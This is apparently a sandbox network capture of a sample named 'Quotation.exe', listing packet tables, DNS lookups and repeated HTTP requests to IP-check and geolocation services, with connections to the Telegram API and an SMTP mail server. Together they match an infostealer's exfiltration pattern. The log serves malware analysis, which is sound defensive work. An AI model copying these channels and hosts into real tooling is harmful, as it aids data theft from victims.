                                                  Oct 7, 2024 10:13:32.112487078 CEST44349708188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:32.154035091 CEST4970780192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:32.575525999 CEST44349708188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:32.577111006 CEST49708443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:32.577137947 CEST44349708188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:32.712269068 CEST44349708188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:32.712348938 CEST44349708188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:32.712399960 CEST49708443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:32.713049889 CEST49708443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:32.719233990 CEST4970780192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:32.720226049 CEST4970980192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:32.724452019 CEST8049707132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:32.724734068 CEST4970780192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:32.725002050 CEST8049709132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:32.725079060 CEST4970980192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:32.725152969 CEST4970980192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:32.730243921 CEST8049709132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:33.399947882 CEST8049709132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:33.401659966 CEST49710443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:33.401702881 CEST44349710188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:33.401774883 CEST49710443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:33.402044058 CEST49710443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:33.402059078 CEST44349710188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:33.450514078 CEST4970980192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:33.896085978 CEST44349710188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:33.898040056 CEST49710443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:33.898061037 CEST44349710188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:34.085563898 CEST44349710188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:34.085665941 CEST44349710188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:34.085724115 CEST49710443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:34.086285114 CEST49710443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:34.089541912 CEST4970980192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:34.090641975 CEST4971180192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:34.094995022 CEST8049709132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:34.095093012 CEST4970980192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:34.095684052 CEST8049711132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:34.095767021 CEST4971180192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:34.095885992 CEST4971180192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:34.100770950 CEST8049711132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:34.779483080 CEST8049711132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:34.780838013 CEST49712443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:34.780889034 CEST44349712188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:34.781092882 CEST49712443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:34.781335115 CEST49712443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:34.781349897 CEST44349712188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:34.825501919 CEST4971180192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:35.260404110 CEST44349712188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:35.262412071 CEST49712443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:35.262440920 CEST44349712188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:35.384670019 CEST44349712188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:35.384780884 CEST44349712188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:35.384848118 CEST49712443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:35.385340929 CEST49712443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:35.390044928 CEST4971380192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:35.394839048 CEST8049713132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:35.395085096 CEST4971380192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:35.395085096 CEST4971380192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:35.399943113 CEST8049713132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:36.067461014 CEST8049713132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:36.069104910 CEST49714443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:36.069144011 CEST44349714188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:36.069231033 CEST49714443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:36.069561958 CEST49714443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:36.069578886 CEST44349714188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:36.106731892 CEST4971380192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:36.527308941 CEST44349714188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:36.529186964 CEST49714443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:36.529211044 CEST44349714188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:36.696413994 CEST44349714188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:36.696532965 CEST44349714188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:36.696616888 CEST49714443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:36.697319984 CEST49714443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:36.702967882 CEST4971380192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:36.704159021 CEST4971580192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:36.708319902 CEST8049713132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:36.708393097 CEST4971380192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:36.709013939 CEST8049715132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:36.709081888 CEST4971580192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:36.709188938 CEST4971580192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:36.714013100 CEST8049715132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:37.375009060 CEST8049715132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:37.376739979 CEST49716443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:37.376795053 CEST44349716188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:37.376874924 CEST49716443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:37.377152920 CEST49716443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:37.377175093 CEST44349716188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:37.419272900 CEST4971580192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:37.840362072 CEST44349716188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:37.842080116 CEST49716443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:37.842103004 CEST44349716188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:38.004780054 CEST44349716188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:38.005055904 CEST44349716188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:38.005136967 CEST49716443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:38.005530119 CEST49716443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:38.008801937 CEST4971580192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:38.010004044 CEST4971780192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:38.014106989 CEST8049715132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:38.014179945 CEST4971580192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:38.014777899 CEST8049717132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:38.014857054 CEST4971780192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:38.014936924 CEST4971780192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:38.019670010 CEST8049717132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:38.680730104 CEST8049717132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:38.682071924 CEST49718443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:38.682113886 CEST44349718188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:38.682208061 CEST49718443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:38.682471991 CEST49718443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:38.682486057 CEST44349718188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:38.731796026 CEST4971780192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:39.157183886 CEST44349718188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:39.159159899 CEST49718443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:39.159193993 CEST44349718188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:39.309822083 CEST44349718188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:39.309942961 CEST44349718188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:39.309999943 CEST49718443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:39.310429096 CEST49718443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:39.313219070 CEST4971780192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:39.314429998 CEST4971980192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:39.318491936 CEST8049717132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:39.318573952 CEST4971780192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:39.319222927 CEST8049719132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:39.319302082 CEST4971980192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:39.319396973 CEST4971980192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:39.324323893 CEST8049719132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:39.987910032 CEST8049719132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:39.989347935 CEST49720443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:39.989408016 CEST44349720188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:39.989567041 CEST49720443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:39.989731073 CEST49720443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:39.989744902 CEST44349720188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:40.031431913 CEST4971980192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:40.458430052 CEST44349720188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:40.460067987 CEST49720443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:40.460103989 CEST44349720188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:40.602828026 CEST44349720188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:40.603077888 CEST44349720188.114.96.3192.168.2.8
                                                  Oct 7, 2024 10:13:40.603153944 CEST49720443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:40.603466988 CEST49720443192.168.2.8188.114.96.3
                                                  Oct 7, 2024 10:13:40.617280006 CEST4971980192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:40.622608900 CEST8049719132.226.247.73192.168.2.8
                                                  Oct 7, 2024 10:13:40.622685909 CEST4971980192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:40.624829054 CEST49721443192.168.2.8149.154.167.220
                                                  Oct 7, 2024 10:13:40.624876022 CEST44349721149.154.167.220192.168.2.8
                                                  Oct 7, 2024 10:13:40.624943972 CEST49721443192.168.2.8149.154.167.220
                                                  Oct 7, 2024 10:13:40.625350952 CEST49721443192.168.2.8149.154.167.220
                                                  Oct 7, 2024 10:13:40.625368118 CEST44349721149.154.167.220192.168.2.8
                                                  Oct 7, 2024 10:13:41.238488913 CEST44349721149.154.167.220192.168.2.8
                                                  Oct 7, 2024 10:13:41.238648891 CEST49721443192.168.2.8149.154.167.220
                                                  Oct 7, 2024 10:13:41.302210093 CEST49721443192.168.2.8149.154.167.220
                                                  Oct 7, 2024 10:13:41.302246094 CEST44349721149.154.167.220192.168.2.8
                                                  Oct 7, 2024 10:13:41.303178072 CEST44349721149.154.167.220192.168.2.8
                                                  Oct 7, 2024 10:13:41.304703951 CEST49721443192.168.2.8149.154.167.220
                                                  Oct 7, 2024 10:13:41.351394892 CEST44349721149.154.167.220192.168.2.8
                                                  Oct 7, 2024 10:13:41.480448008 CEST44349721149.154.167.220192.168.2.8
                                                  Oct 7, 2024 10:13:41.480618000 CEST44349721149.154.167.220192.168.2.8
                                                  Oct 7, 2024 10:13:41.480724096 CEST49721443192.168.2.8149.154.167.220
                                                  Oct 7, 2024 10:13:41.484734058 CEST49721443192.168.2.8149.154.167.220
                                                  Oct 7, 2024 10:13:47.768167019 CEST4971180192.168.2.8132.226.247.73
                                                  Oct 7, 2024 10:13:48.076371908 CEST4972725192.168.2.8192.250.231.25
                                                  Oct 7, 2024 10:13:49.091130018 CEST4972725192.168.2.8192.250.231.25
                                                  Oct 7, 2024 10:13:51.091090918 CEST4972725192.168.2.8192.250.231.25
                                                  Oct 7, 2024 10:13:55.106795073 CEST4972725192.168.2.8192.250.231.25
                                                  Oct 7, 2024 10:14:03.122343063 CEST4972725192.168.2.8192.250.231.25
                                                  Oct 7, 2024 10:14:10.641695023 CEST4972825192.168.2.8192.250.231.25
                                                  Oct 7, 2024 10:14:11.653695107 CEST4972825192.168.2.8192.250.231.25
                                                  Oct 7, 2024 10:14:13.669241905 CEST4972825192.168.2.8192.250.231.25
                                                  Oct 7, 2024 10:14:17.669204950 CEST4972825192.168.2.8192.250.231.25
                                                  Oct 7, 2024 10:14:25.669231892 CEST4972825192.168.2.8192.250.231.25
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 7, 2024 10:13:27.996126890 CEST5582853192.168.2.81.1.1.1
                                                  Oct 7, 2024 10:13:28.003911018 CEST53558281.1.1.1192.168.2.8
                                                  Oct 7, 2024 10:13:29.778098106 CEST5384053192.168.2.81.1.1.1
                                                  Oct 7, 2024 10:13:29.786932945 CEST53538401.1.1.1192.168.2.8
                                                  Oct 7, 2024 10:13:40.617278099 CEST4935153192.168.2.81.1.1.1
                                                  Oct 7, 2024 10:13:40.624269962 CEST53493511.1.1.1192.168.2.8
                                                  Oct 7, 2024 10:13:48.053837061 CEST5087153192.168.2.81.1.1.1
                                                  Oct 7, 2024 10:13:48.075033903 CEST53508711.1.1.1192.168.2.8
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Oct 7, 2024 10:13:27.996126890 CEST192.168.2.81.1.1.10x8478Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 10:13:29.778098106 CEST192.168.2.81.1.1.10xeaa0Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 10:13:40.617278099 CEST192.168.2.81.1.1.10x5ce4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                  Oct 7, 2024 10:13:48.053837061 CEST192.168.2.81.1.1.10xc65bStandard query (0)mail.electradubai.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Oct 7, 2024 10:13:28.003911018 CEST1.1.1.1192.168.2.80x8478No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                  Oct 7, 2024 10:13:28.003911018 CEST1.1.1.1192.168.2.80x8478No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 10:13:28.003911018 CEST1.1.1.1192.168.2.80x8478No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 10:13:28.003911018 CEST1.1.1.1192.168.2.80x8478No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 10:13:28.003911018 CEST1.1.1.1192.168.2.80x8478No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 10:13:28.003911018 CEST1.1.1.1192.168.2.80x8478No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 10:13:29.786932945 CEST1.1.1.1192.168.2.80xeaa0No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 10:13:29.786932945 CEST1.1.1.1192.168.2.80xeaa0No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 10:13:40.624269962 CEST1.1.1.1192.168.2.80x5ce4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                  Oct 7, 2024 10:13:48.075033903 CEST1.1.1.1192.168.2.80xc65bNo error (0)mail.electradubai.com192.250.231.25A (IP address)IN (0x0001)false
                                                  • reallyfreegeoip.org
                                                  • api.telegram.org
                                                  • checkip.dyndns.org
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.849704132.226.247.73802168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 7, 2024 10:13:28.015691996 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Oct 7, 2024 10:13:28.708383083 CEST320INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:28 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  X-Request-ID: f2c9b4598b5c61269776b01f117db3f9
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                  Oct 7, 2024 10:13:28.796660900 CEST127OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Oct 7, 2024 10:13:29.041935921 CEST320INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:28 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  X-Request-ID: de650f9731f909e99e136495b876776b
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                  Oct 7, 2024 10:13:30.623306036 CEST127OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Oct 7, 2024 10:13:30.833537102 CEST320INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:30 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  X-Request-ID: 70545a99b98f5c129ef6835c33ffd35f
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.849707132.226.247.73802168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 7, 2024 10:13:31.443406105 CEST127OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Oct 7, 2024 10:13:32.110574007 CEST320INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:32 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  X-Request-ID: d7f2a3eba2554cb6d8a11e4d744e0079
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.849709132.226.247.73802168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 7, 2024 10:13:32.725152969 CEST127OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Oct 7, 2024 10:13:33.399947882 CEST320INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:33 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  X-Request-ID: 857176a3d3ed1a19bfcbc26c10abbb70
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.849711132.226.247.73802168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 7, 2024 10:13:34.095885992 CEST127OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Oct 7, 2024 10:13:34.779483080 CEST320INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:34 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  X-Request-ID: 615fb9d78e586ad2dd9ebe8fe1d7fc98
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.849713132.226.247.73802168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 7, 2024 10:13:35.395085096 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Oct 7, 2024 10:13:36.067461014 CEST320INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:35 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  X-Request-ID: 17d14fa021ac51b1dad1668552bf9db7
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.849715132.226.247.73802168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 7, 2024 10:13:36.709188938 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Oct 7, 2024 10:13:37.375009060 CEST320INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:37 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 103
                                                  Connection: keep-alive
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  X-Request-ID: 4a678f2a2196b38833fdcc4929505daf
                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.849717132.226.247.73802168C:\Users\user\Desktop\Quotation.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 7, 2024 10:13:38.014936924 CEST151OUTGET / HTTP/1.1
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                  Host: checkip.dyndns.org
                                                  Connection: Keep-Alive
                                                  Oct 7, 2024 10:13:38.680730104 CEST320INHTTP/1.1 200 OK
                                                  Date: Mon, 07 Oct 2024 08:13:38 GMT
